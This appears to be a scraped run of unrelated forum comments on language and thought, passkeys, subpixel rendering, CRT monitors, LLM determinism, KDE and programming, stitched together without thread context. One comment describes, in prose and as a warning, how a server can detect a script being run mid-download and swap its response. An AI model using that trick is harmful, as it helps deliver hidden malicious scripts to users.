Am I the exception? When thinking I don't conceptualize things in words - the compression would be too lossy. Maybe because I'm fluent in three languages (one germanic, one romance, one slavic)?
Our brains reason in many domains depending on the situation.
For domains built primarily on linguistic primitives (legal writing), we do often reason through language. In other domains (i.e spatial) we reason through vision or sound.
We experience this distinction when we study the formula vs the graph of a mathematical function, the former is linguistic, the latter is visual-spatual.
And learning multiple spoken languages is a great way to break out of particularly rigid reasoning patterns, and as important, countering biases that are influenced by your native language.
How exactly is this "reducing the security level to those of passwords"? For example: you can't use a passkey on attacker's web site even if you have a plaintext copy of the private key.
And especially not run the script while it's downloading. The remote server can detect timing difference (let's say the script has "sleep 30" and the buffer fills) and send a different response (really easy if using chunked encoding or HTTP2 data frames).
Subpixel rendering works completely fine on Linux. I'm using it right now, using "full" hinting and "RGB" subpixel rendering. It even works completely fine with "non-integer" scaling in KDE, even in firefox when "widget.wayland.fractional-scale.enabled" is enabled.
On the other hand, subpixel rendering is absent from MacOS and makes it very difficult to using regular ol' 1920x1080 screens with modern MacOS. Yes, those Retina displays look nice, but it's a shame that lower res screens do not because they work perfectly fine except for the font rendering.
Hm... I am reading this on a 1600x900 screen of my T420s Frankenpad while sitting in dusk in a German campsite. I ordered the screen some 10 years ago off Alibaba or something, and it is exactly the resolution and brightness I need. I hope I will die before this Frankenpad, because contemporary laptops are awful in so many aspects.
You know... as you age, you really can't read all those tiny characters anyway.
> I think it's an amazing feat of marketing, by display companies, that people still put up with such low resolutions.
Stereo audio is still fine even though 5.1 exists
300 dpi printers are still useable even though 2400 dpi printers exist
double-glass windows are still fine even though triple-glass windows exist
2-wheel drive cars are still fine even though 4-wheel drive cars exist
Just because something new appears on the market that new thing does not need to take over from all predecessors when those predecessors are good enough for the intended purpose, especially not when the new thing comes with its costs - power use and higher demands on GPUs in case of display with higher resolutions than really needed.
We're animals, that are perfectly fine living naked in the wild (some still do today). It's all complete excess. Feel free to abandon the progression of tech, but, I challenge you to use a modern panel for a couple months, then try to go back to 1080p. It's like the console players who claimed 30fps was serviceable, fine. Sure, but nobody wants to go back to 30fps after they've used 60hz, or 144hz, for a non-negligible amount of time.
I also use a 1080p from time to time, it's servicable, but it's not comfortable, and it provides a far far inferior experience.
A Full HD CRT from the roadside in 2003? As if this was just a thing people had happen to them? Is this some elaborate joke I'm missing?
> I haven't owned a smartphone with a screen resolution that low
Smartphone in italics, because smartphones are known for their low pixel densities, right? What?
Did you own a smartphone at all in the past 10 years? Just double checking.
> I think it's an amazing feat of marketing, by display companies, that people still put up with such low resolutions.
And how did you reach that conclusion? Did you somehow miss display companies selling and pushing 1440p and 4K monitors left and right for more than a handful of years at this point, and yet the Steam Hardware Survey still bringing out 1080p monitors as the king month to month?
Sometimes I really do wonder if I live in a different world to others.
> As if this was just a thing people had happen to them?
No, literally, on the roadside, out for trash. Disposing of CRT has always been expensive since they can't fit in the trash and taking them to the dump has a fee for the all the lead. At the transition to LCD, they were all over the place, along with projection TVs. There was also a lot of churn when "slimmer" versions came out, that mostly halved the depth required. Again, it was literally 50lbs, and about 2ft in depth. It took up my whole desk. It was worthless to most anyone.
> Smartphone in italics, because smartphones are known for their low pixel densities, right? What?
Over 10 years ago I had an iPhone 6 plus, with 1080p resolution. All my phones after have been higher. Their pixel densities (DPI) are actually pretty great, but since they're small, their pixel counts are on the lower side. There's nothing different about smartphone displays. The display manufacturers use the same process for all of them, with the same densities.
I think the italics are because it's so weird that most people have more pixels on the 6" display in their pocket than on the 24" display on their desk.
No, it was limited by the bandwidth of the beam driving system, which the manufactures, obviously, tried to maximize. This limit is what set the shadow mask and RGB sub pixels/strip widths. The electron beam couldn't make different color, different colored phosphor patches were used.
But, since bandwidth is mostly resolution * refresh, you could trade between the two: more refresh, less resolution. More resolution, less refresh. Early on, you had to download a "driver" for the monitor, which had a list of the supported resolutions and refresh rates. There was eventually a protocol made to query the supported resolutions, straight from the monitor. But, you could also just make your own list (still can) and do funky resolutions and refresh rates, as long as the drive circuit could accommodate.
This monitor could do something like 75Hz at 800x600, and I think < 60 at 1080p.
I got a 21" Hitachi Superscan Elite or Supreme around that time from a gamer.
Because that thing could only do the BIOS text modes, and standard VGA at 640x480 at 60 or 70Hz. Anything else just showed OUT OF SYNC on the OSD, and then switched off.
Except when you fed it 800x600@160Hz, 1024x768@144Hz, 1280@120Hz and 1600x1200@70 to 80Hz, or anything weird in between.
I could easily do that under XFree86 or early X.ORG. A gamer under DOS/Windows rather not, not even with Scitech Display Doctor, because most games at that time used the hardware directly, with only a few standard options to chose from.
OUT-OF-SYNCzing
Was nice for viewing 2 DIN-A4 side by side in original size :-)
Fortunately a Matrox I had could drive that, as could a later Voodoo3 which also had excellent RAMDACs and X support.
That sounds weird and fun, although I can't seem to find the pattern that would have resulted in those numbers. 1024×768@144 (8bpc) works out to 340 MB/s, while 800×600@160 (8bpc) works out to just 230 MB/s, should have been able to refresh even faster. Or is that some other limitation that's not bandwidth? [0]
Was a bit surprised by that double A4 thing btw, but I did the math and it checks out - paper is just surprisingly small compared to desktop displays. Both size and resolution wise (1612×1209 would have put you right up to 96 ppi, with regular 1600×1200 being pretty close too). It's kind of ironic even, the typical 1080p 24" 60 Hz LCD spec that's been with us for decades since just barely fits an A4 height wise, and has a slightly lower ppi. Does have some extra space for sidebars at least, I guess.
[0] Update: ah right, it wasn't a pixel clock limit being ran to the limit there, but the horizontal frequency.
That are the resolutions and frequencies I do remember having tested without trouble. Indeed I could go even faster on the lower ones, but didn't dare to for long, because they sometimes produced very weird high-frequent noises, sometimes unsharpness, and I didn't want to break that wonderful piece of kit.
Did care about 1600x1200 at then 75Hz mostly. All that other stuff was just for demonstration purposes for other people coming by, or watching videos fullscreen in PAL.
It seemed to be really made for that resolution at a reasonable frequency, with the BIOS & VGA thing just implemented to be able to see start up, changing settings, and all the rest just a 'side-effect'.
Yeah, DDC and EDID were standardized in '94, and were widely available and working well by '98 - if you were on Windows at least, running fresh hardware.
> This monitor could do something like 75Hz at 800x600, and I think < 60 at 1080p.
Assuming both modes were meant with 24-bit color ("true color"), that'd mean 17.36 Hz tops then for the FHD mode, ignoring video timing requirements. I don't think you were using that monitor at 17 Hz.
Even if you fell back to 16 bit color, that's still at most 26 Hz, which is miserable enough on a modern sample-and-hold style display, let alone on a strobed one from back in the day. And that is to say nothing of the mouse input feel.
They still had very real limitations in terms of the signal they accepted, and color CRTs specifically had discrete color patches forming discrete, fixed number of triads.
I had the same experience: no one knew of my mentors what "dynamic programming" was and our country-level competition (that had created problems inspired by IOI) required dynamic programming for 2 out of 5 problems. And of course I failed the first time (2004). Then I learned what it was about and aced the next time (2005).
The two parts of your statement don't go together. A list of potential output tokens and their probabilities are generated deterministically but the actual token returned is then chosen at random (weighted based on the "temperature" parameter and the probability value).
I assume they use software-based pseudo-random-number generators. Those can typically be given a seed-value which determines (deterministically) the sequence of random numbers that will be generated.
So if an LLM uses a seedable pseudo-random-number-generator for its random numbers, then it can be fully deterministic.
There are subtle sources of nondeterminism in concurrent floating point operations, especially on GPU. So even with a fixed seed, if an LLM encounters two tokens with very close likelihoods, it may pick one or the other across different runs. This has been observed even with temperature=0, which in principle does not involve _any_ randomness (see arXiv paper cited earlier in this thread).
KDE is that. The two things I don't like about it are: KIO integration with GTK apps even with kio-fuse installed, and not having dbus based configuration system like gsettings/dconf.
Not sure if it's a NixOS bug, but even other KDE apps have hit-or-miss KIO integration for me; e.g. Krusader cannot open my MTP devices, while Dolphin can.
IMO, to be a good programmer, you need to have basic understanding of what a compiler does, what a build system does, what a normal processor does, what a SIMD process does, what your runtime's concurrency model does, what your runtime's garbage collector does and when, and more (what your deployment orchestrator does, how your development environment differ from the production...).
You don't need to have any understanding on how it works in any detail or how to build such a system yourself, but you need to know the basics.
Sure - we just need to learn to use the tools properly: Test Driven Development and/or well structured Software Engineering practices are proving to be a good fit.
If it's been indexed by a Web search engine surely it's in a training dataset. The most popular Web search engines are the least efficient way of finding answers these days.
But just because it's in the training set doesn't mean the model retains the knowledge. It acquires information that is frequently mentioned and random tidbits of everything else. The rest can be compensated with the 20 web searches models more get. That's great when you want a react dropdown, but for that detail that's mentioned in one Russian-speaking forum and can otherwise only be reduced by analysing the leaked Windows XP source code AI will continue to struggle for a bit.
Of course AI is incredibly useful both for reading foreign language forums and for analysing complex code bases for original research. AI is great for supercharging traditional research